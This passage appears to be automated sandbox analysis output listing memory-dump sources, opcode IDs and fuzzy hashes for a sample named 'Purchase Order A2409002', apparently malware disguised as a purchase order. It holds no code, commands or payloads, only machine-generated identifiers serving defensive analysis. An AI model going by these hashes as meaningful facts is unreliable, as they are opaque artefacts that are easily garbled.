                                        • Instruction Fuzzy Hash: E7315C75A00118EFDF04DBA5D894AEEB7B6FF88311F108169E815BB290DB31AD41CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0997ce03d175194ac69aa35e6b8cc6208732a87f5211f346fcc287d20fe2d3a6
                                        • Instruction ID: 4f1fbed2aa38c3a2bc9fdd5c751e6a6399a1837361e7d90f8fb9fef8ed0768f2
                                        • Opcode Fuzzy Hash: 0997ce03d175194ac69aa35e6b8cc6208732a87f5211f346fcc287d20fe2d3a6
                                        • Instruction Fuzzy Hash: 4341D074944318CFEF40CFA9D888BDDBBB5FF0A304F186159E405AB286C3389985CBA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c91c8b79cb2445dac0e19a6f4212fce0b9396a3cd7901ddb5dc6dad7c6b66b0a
                                        • Instruction ID: 7f79903da425e24f1e73e8b2f3ddb1235824b8aeeaff6227c1d6858ccaad98bb
                                        • Opcode Fuzzy Hash: c91c8b79cb2445dac0e19a6f4212fce0b9396a3cd7901ddb5dc6dad7c6b66b0a
                                        • Instruction Fuzzy Hash: 5F313472D0520ADFDB45DFA9D944BEEBBF6BB49310F10806AD515B7290C3740A44CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bc93b9e552b7f8303da047cee0981213b3236c1ab2bdb048396b10cc801726ae
                                        • Instruction ID: 14e30975e1ea461df8905d9f475062818581d44d5249700073ba945c60957234
                                        • Opcode Fuzzy Hash: bc93b9e552b7f8303da047cee0981213b3236c1ab2bdb048396b10cc801726ae
                                        • Instruction Fuzzy Hash: 2D41CF70944218CFEF50CF9AD488BDDBBF5FF4A304F185119E40AAB285C3789885CBA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfe39df99ed66d6a39d84ffd98b24060fc593d59d93cd7e30ffad6700dff89be
                                        • Instruction ID: 7b04d1a0245a0a5aab2722ab65497bcbe1badb40035d99267bfb25d947ac97fb
                                        • Opcode Fuzzy Hash: bfe39df99ed66d6a39d84ffd98b24060fc593d59d93cd7e30ffad6700dff89be
                                        • Instruction Fuzzy Hash: 1C317E35B00204DFCF599FA4C854A9E7BB7FF8D310B0541A9EA0A9B3A5CA31DC16DB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3871c6289aac256cea56cf9592e83120437aca2caaaca05583b223b987f6f7d3
                                        • Instruction ID: acac43b23fe7a567cee7fff0c825dab6d9fe8a2c8ab2f0b66b5356f128bca4fb
                                        • Opcode Fuzzy Hash: 3871c6289aac256cea56cf9592e83120437aca2caaaca05583b223b987f6f7d3
                                        • Instruction Fuzzy Hash: 4B41B074944218CFEF40CF99D488BDDB7B5FF4A304F195119E406AB286C3789885CF65
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0d68f44556b3e392e400f188b250d6142ab947d437cddfab92eea4e68e0db00
                                        • Instruction ID: 68481517ee033e09eede3e41e491c3d46fd58ebc937276c636038732f6184001
                                        • Opcode Fuzzy Hash: a0d68f44556b3e392e400f188b250d6142ab947d437cddfab92eea4e68e0db00
                                        • Instruction Fuzzy Hash: 73315270E4120ACFDB44CFAAD940AEEBBF2BF88360F14946AD429B3250D7754944CFA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54bd878fa34f57056e53b8f88cc937b6cdb555c1a4e134547f41c5c175d7acde
                                        • Instruction ID: c88ffcc830ad65d605f46c996d108aa41d6ec8672bf2afc4ea47ebbc85896ee2
                                        • Opcode Fuzzy Hash: 54bd878fa34f57056e53b8f88cc937b6cdb555c1a4e134547f41c5c175d7acde
                                        • Instruction Fuzzy Hash: 54312272D0421ADFDB80DFA9DA44BEEBBF6BB48310F108029D515B7250C3741A44CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc12e2411ae1194611f17aa7a11d1ce7f305a19670e3b50c23decb503d1e68b3
                                        • Instruction ID: 49a463cba37dc75f09c7f3732addf261c5b547ac320f42578b677ad21cd699c1
                                        • Opcode Fuzzy Hash: dc12e2411ae1194611f17aa7a11d1ce7f305a19670e3b50c23decb503d1e68b3
                                        • Instruction Fuzzy Hash: 99310370D04219CFEBA0CF65C984BA9BBF2FB89360F1090A9D56AA3351DB745D84CF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: da9bc062ae0d1ab44f537a57214df062b0bc5c4487e4dbe62d333f0dc6d19834
                                        • Instruction ID: 0f753f67cfef384ec3ab8964399838f154edc552fc17d0af38c2673398b64714
                                        • Opcode Fuzzy Hash: da9bc062ae0d1ab44f537a57214df062b0bc5c4487e4dbe62d333f0dc6d19834
                                        • Instruction Fuzzy Hash: EA41E274944318CFEF50CF99D488BDDBBB5FF0A304F185159E406AB286C3389885CBA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2324244085.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f80000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 737e95e496896d2bda7f8358c376da0b8ac60e9479123d08a798db5028fdc47e
                                        • Instruction ID: e76622c8afd5d5aaf00cb5afc2d35f50d11d81fef04aaec354e46b139ae8316c
                                        • Opcode Fuzzy Hash: 737e95e496896d2bda7f8358c376da0b8ac60e9479123d08a798db5028fdc47e
                                        • Instruction Fuzzy Hash: 943147B0D01249DFDB10DFA9C590BDEBFF1BF48340F248029E549AB250DB359946CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 62ba66a44dc2071d5677775ecc0ccc26aabf77134146f698cbbc01edd4e8dbed
                                        • Instruction ID: 1546ead53ee5ea0f787ca56a0fb008a8107bef65a253f96d1dd9a0871c6c5cfe
                                        • Opcode Fuzzy Hash: 62ba66a44dc2071d5677775ecc0ccc26aabf77134146f698cbbc01edd4e8dbed
                                        • Instruction Fuzzy Hash: F6315570E04209DFEB44CFAAD4846AEBBF2FB89310F10C0A9D529A7350D7785A85CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d297d54516f6526b07ec21b1b874e8e29a05d74ec8c8684418b60d6fbdd6810c
                                        • Instruction ID: c66433882ca05f799fda67a474652753474e4a1e025848bf1e84d16ba419c335
                                        • Opcode Fuzzy Hash: d297d54516f6526b07ec21b1b874e8e29a05d74ec8c8684418b60d6fbdd6810c
                                        • Instruction Fuzzy Hash: A4315771E4120ACFDB44CFAAD940AEEBBF2BF88320F149129D429B3250D7745945CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 194a8445fc843159418a5c69a767fe773441cbf830b0e9ee2175ef6c842dc7d8
                                        • Instruction ID: ccdd1e1093546aa042173b30f7e6bf18f1a72f5fc99dd6f0d8e53f0a3b92c8ec
                                        • Opcode Fuzzy Hash: 194a8445fc843159418a5c69a767fe773441cbf830b0e9ee2175ef6c842dc7d8
                                        • Instruction Fuzzy Hash: 3B21F572304B188FD7208B69E480A66BBEEEBC5369B15867EE10EC7241CF36EC41C751
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f83e1423fa03287e695722c4271ae512c8bab60530d1f190e077d66cee77ae5c
                                        • Instruction ID: 88ba8d744382bea8c41f39797f55d1c4b79f04ba9313ed4d95347f164ac12925
                                        • Opcode Fuzzy Hash: f83e1423fa03287e695722c4271ae512c8bab60530d1f190e077d66cee77ae5c
                                        • Instruction Fuzzy Hash: 2C41DF74944218CFEF40CFA9D488BDDBBB5FF0A304F195159E40AAB286C3789885CFA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2aa7bfad95a964a6b672ca90f7397ff71727befa2401cd8be1f22aff35afab69
                                        • Instruction ID: ddef7433d78c662bb276fafbabbc749fdbc40b84a3cf7a617f48d4bc32f3bb93
                                        • Opcode Fuzzy Hash: 2aa7bfad95a964a6b672ca90f7397ff71727befa2401cd8be1f22aff35afab69
                                        • Instruction Fuzzy Hash: DA31B074944218CFEF50CF99D488BDDB7B5FF4A304F186119E40AA7296C37898858F65
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c5b1f3fce645ffc40d046ef9c7b036bf90cadc1f89ec08ff4684963e4685bfe
                                        • Instruction ID: b22e96705ce55066c2c1c61f3c957c2093d37bc27f4b501e15845aeb822cd69c
                                        • Opcode Fuzzy Hash: 2c5b1f3fce645ffc40d046ef9c7b036bf90cadc1f89ec08ff4684963e4685bfe
                                        • Instruction Fuzzy Hash: CB41BF74904218CFEF50CFAAD888BDDB7B5FF4A304F185159E40AAB295C37898858BA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3fffd0acc7b9b0b67a570e081fd472677198609c1d5f4a6be1af65f4aa4f4ae5
                                        • Instruction ID: 1f1d82142e7a5ff576a25d718f5c4744a942ba53024b09d7409a141a977028ef
                                        • Opcode Fuzzy Hash: 3fffd0acc7b9b0b67a570e081fd472677198609c1d5f4a6be1af65f4aa4f4ae5
                                        • Instruction Fuzzy Hash: 00312770E0420ADFEB44CF9AD5846AEBBF6FB88310F10D0A9D529A7350D7785985CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3a3f2dc53f80439daddebe2f5c8bcce215bd8417f2675c9bd0b6a545c28d4a3a
                                        • Instruction ID: 64d1fb17bb442d5aee7edffa6bf983183c8f9c32d3ea7cc25563643468298cf1
                                        • Opcode Fuzzy Hash: 3a3f2dc53f80439daddebe2f5c8bcce215bd8417f2675c9bd0b6a545c28d4a3a
                                        • Instruction Fuzzy Hash: 1831BF74944218CFEF50CF99D888BDDB7B5FF4A304F186119E40AAB286C3789885CFA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2324244085.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f80000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1dfc1626dc96417c866c7ea8f4dc0860e187af76abc37c493469a6061f38cf4
                                        • Instruction ID: 3507db419c482117f28f68d569a10b0dc64c70dd9197317299833d66ce1d4214
                                        • Opcode Fuzzy Hash: f1dfc1626dc96417c866c7ea8f4dc0860e187af76abc37c493469a6061f38cf4
                                        • Instruction Fuzzy Hash: D13114B0D012499FDB10DFAAC980ADEBBF5BF48740F248029E919AB250DB359945CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 385abda41ef6f50bb044daf25a0b3b2d82f4bc64d9357cbc8092b5fa114ab233
                                        • Instruction ID: 21b8f5cc9fcfe93b1ea807132143e9a17875df0a98def74b412b5a432cb66a2a
                                        • Opcode Fuzzy Hash: 385abda41ef6f50bb044daf25a0b3b2d82f4bc64d9357cbc8092b5fa114ab233
                                        • Instruction Fuzzy Hash: 7C31E670E05359DFEBA4CB1AC8847EAB6B2AF8A304F14A0E5D00DA7241D7754DC4CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 75312c8f3791fd135eb4e9a518c210cdb60b5631b64cac3dbbfa883bab48cf74
                                        • Instruction ID: 05b7cee68960c1e157e774ebf8d661b67a197475da0a2e49bd670f6812abce1c
                                        • Opcode Fuzzy Hash: 75312c8f3791fd135eb4e9a518c210cdb60b5631b64cac3dbbfa883bab48cf74
                                        • Instruction Fuzzy Hash: 7F11A27695711ABFC3209A18DD15EEBBB6FEBC9351F004099E94657241CB306842DEF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d885c67874671f5d8917218e0633c59dce7fd270d9eadf1fd6d747c8d972a89
                                        • Instruction ID: 72c8f1ad182a7b1baa18997f24c6d12256902c294aeaafa7a51791ca947d7bc9
                                        • Opcode Fuzzy Hash: 8d885c67874671f5d8917218e0633c59dce7fd270d9eadf1fd6d747c8d972a89
                                        • Instruction Fuzzy Hash: F6317974B10A09CFCB00EF68C4949AEF7B9FF89700B104629D50597354EF74A946CB92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb9dcf2c07a4a040253db23affd6ad5f405044858af0fa784b4828f065e743f0
                                        • Instruction ID: a4883ccd682205cb5589bda4d9b6756090cde2be76fdfb31af29e953e6e32cec
                                        • Opcode Fuzzy Hash: bb9dcf2c07a4a040253db23affd6ad5f405044858af0fa784b4828f065e743f0
                                        • Instruction Fuzzy Hash: 7B314870D04249EFDB84DFAAE9806ACBBF1FF89310F1084AAD419A3351D7B44A81CF41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66d8a05ed2c61c0a28fa72c82fff973b38da166efc9a75aee8f207be75a136b0
                                        • Instruction ID: 306228b4cac115fad339497aae1308343c04b5de6c61b8eea2614909c074b81a
                                        • Opcode Fuzzy Hash: 66d8a05ed2c61c0a28fa72c82fff973b38da166efc9a75aee8f207be75a136b0
                                        • Instruction Fuzzy Hash: CD218E75A00119DFDB099FA9C8549EEBBB7EB8C320F148129E911E7394DB319846CFA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f4904704bda5ff8803f209704c3ec88d193e2e80fb234ce1f64515f11009477
                                        • Instruction ID: 86a69eb11d43902b99b69604e14ca46da60d7f3730bd7ac4030880f6dad49c9b
                                        • Opcode Fuzzy Hash: 1f4904704bda5ff8803f209704c3ec88d193e2e80fb234ce1f64515f11009477
                                        • Instruction Fuzzy Hash: 3F219BB4A04709CFC701EF69C4949AEBBB9FF8D300B10466AD545D7360EB74AE45CBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1206a6acc1978115087b8be1df90038c08ce783a5e169f8d2ad79b3575f515e
                                        • Instruction ID: 7250b0f19bf3c9129680c230b25211a58eca8a1cdbeb2035fdd791eb46f66887
                                        • Opcode Fuzzy Hash: f1206a6acc1978115087b8be1df90038c08ce783a5e169f8d2ad79b3575f515e
                                        • Instruction Fuzzy Hash: CC3147B0E0020ACFDB44DF99D658AAEB7B6FB8A311F208069D512AB354C7346D51CFA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b0ad014c214c0966a65b9a742a766a25888fa31419fa35cac07a6a40eae65c7a
                                        • Instruction ID: 3873b4970678c6b363b4046851dbb30110ba25e33f04512d7c637a65c5ae8131
                                        • Opcode Fuzzy Hash: b0ad014c214c0966a65b9a742a766a25888fa31419fa35cac07a6a40eae65c7a
                                        • Instruction Fuzzy Hash: FD31ABB0E0020ACFDB44DFA8D644AAEBBF6FB8A311F10806AD101A7350C7346D54CFA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c24fbf09210ab25afc29cd62f9596add0b26f77517a19f0384e2dff76a6f5d8e
                                        • Instruction ID: 66607fb763d0f79c8f53c31a12ff2bf0bbc770b8596b80699cb50959700d46dc
                                        • Opcode Fuzzy Hash: c24fbf09210ab25afc29cd62f9596add0b26f77517a19f0384e2dff76a6f5d8e
                                        • Instruction Fuzzy Hash: 25312731A00209CFDB58DFA9C940ADDB7F2EF8C311F2005A8D545AB3A1C7719D41CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1a622bc304775e23ed5a1d7c59829f575cbf395ad04fdb6303cc55372c40fd56
                                        • Instruction ID: 0219a1819c1dc5dac16e388e837983eca058d47e55b9608860f2b6a2bd7a9209
                                        • Opcode Fuzzy Hash: 1a622bc304775e23ed5a1d7c59829f575cbf395ad04fdb6303cc55372c40fd56
                                        • Instruction Fuzzy Hash: 5A219031E0120ADFDB80DBB9C604BAEBBF6AF44360F10806AD505D7290E734CA41DB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c4e4abe6a1460d623eae800eb6eb45bb93118bb88dd95b6c34de0ce843923da
                                        • Instruction ID: 00067c722187f2647756fbb06382b7079f4d87c019c639d58d1c846e07c78ba8
                                        • Opcode Fuzzy Hash: 7c4e4abe6a1460d623eae800eb6eb45bb93118bb88dd95b6c34de0ce843923da
                                        • Instruction Fuzzy Hash: D121CF35A042018FDB40DB78E8557BE7BA6EBC9318F00893DD10AC7784DBB5A9068B90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2323988434.0000000002EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EFD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2efd000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92823c1e0282f20135038957393da8a94e3eadd408f1b561f5fe0d65c509524d
                                        • Instruction ID: 3b261ee9f96772036849f913f34745790c7ac1f3dc50b3cb32b8370b91709c97
                                        • Opcode Fuzzy Hash: 92823c1e0282f20135038957393da8a94e3eadd408f1b561f5fe0d65c509524d
                                        • Instruction Fuzzy Hash: 92316D711093C49FCB038F24D994715BF71AB46214F2981DAD9848F2A7C33A981ACB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2323988434.0000000002EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EFD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2efd000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3dfeb244bee99f5dc253600b4299b81c078cf259281787be4a4f7f23d7f70ea
                                        • Instruction ID: 442ed7903debd2fb1d969029dcb0e415b83bfab827ab6d28da292fdfa34a322c
                                        • Opcode Fuzzy Hash: f3dfeb244bee99f5dc253600b4299b81c078cf259281787be4a4f7f23d7f70ea
                                        • Instruction Fuzzy Hash: 53212572544204EFDB51DF14DDC4B26BF66FB88318F20C169DA090B646C336D806CAA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344309221.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d70000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4a97710c36aa765e23a63bf16e62a7a2bb8a4d5ca3a2e3ae7cc1160a39e5632
                                        • Instruction ID: 32dbd057df1e732ef9be79c33fb905f18c878d807e8c71e9aa5002e9602affd9
                                        • Opcode Fuzzy Hash: a4a97710c36aa765e23a63bf16e62a7a2bb8a4d5ca3a2e3ae7cc1160a39e5632
                                        • Instruction Fuzzy Hash: 55219D717041449FCB55DF6AC840AAA7BFAAF8A310F0940A5FC54CB3A1EB31DC50DB21
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2324244085.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f80000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e0e4e58e554e9eb80cf6b10ad6dec0de7a0230d3c05739ac294347b4a991cdc0
                                        • Instruction ID: 0adc213ca588694e47bf9ddf1b081e328e076bebef931c350c28f1b776f7b30b
                                        • Opcode Fuzzy Hash: e0e4e58e554e9eb80cf6b10ad6dec0de7a0230d3c05739ac294347b4a991cdc0
                                        • Instruction Fuzzy Hash: 3E312A31E00219DFCB44EFA9E844AEDBBB2FF88310F508129EA15A7254DB305D45CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2324244085.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f80000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 866b0ad5f32935456f8b0f92e227b90595ae8121d03bbc6ea3e935b6e5faa019
                                        • Instruction ID: 7fa7353af70c5e02703d4add972ec609981f10ffb2dc3ea8fbe21de90d6f9d1e
                                        • Opcode Fuzzy Hash: 866b0ad5f32935456f8b0f92e227b90595ae8121d03bbc6ea3e935b6e5faa019
                                        • Instruction Fuzzy Hash: A9210A70D84248DFEB80EFA5D5897ADBBF1FB8D305F50D4A9DA0AA3240D7741985CB42
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344309221.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d70000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7ff5bb01e085dec6abe40220208f3e4726b843705fddc90a51b93776b8613e3
                                        • Instruction ID: 3a64004469516cbf5615232a745bc5ccf36c188884e2e4e3de065ab44fa974aa
                                        • Opcode Fuzzy Hash: a7ff5bb01e085dec6abe40220208f3e4726b843705fddc90a51b93776b8613e3
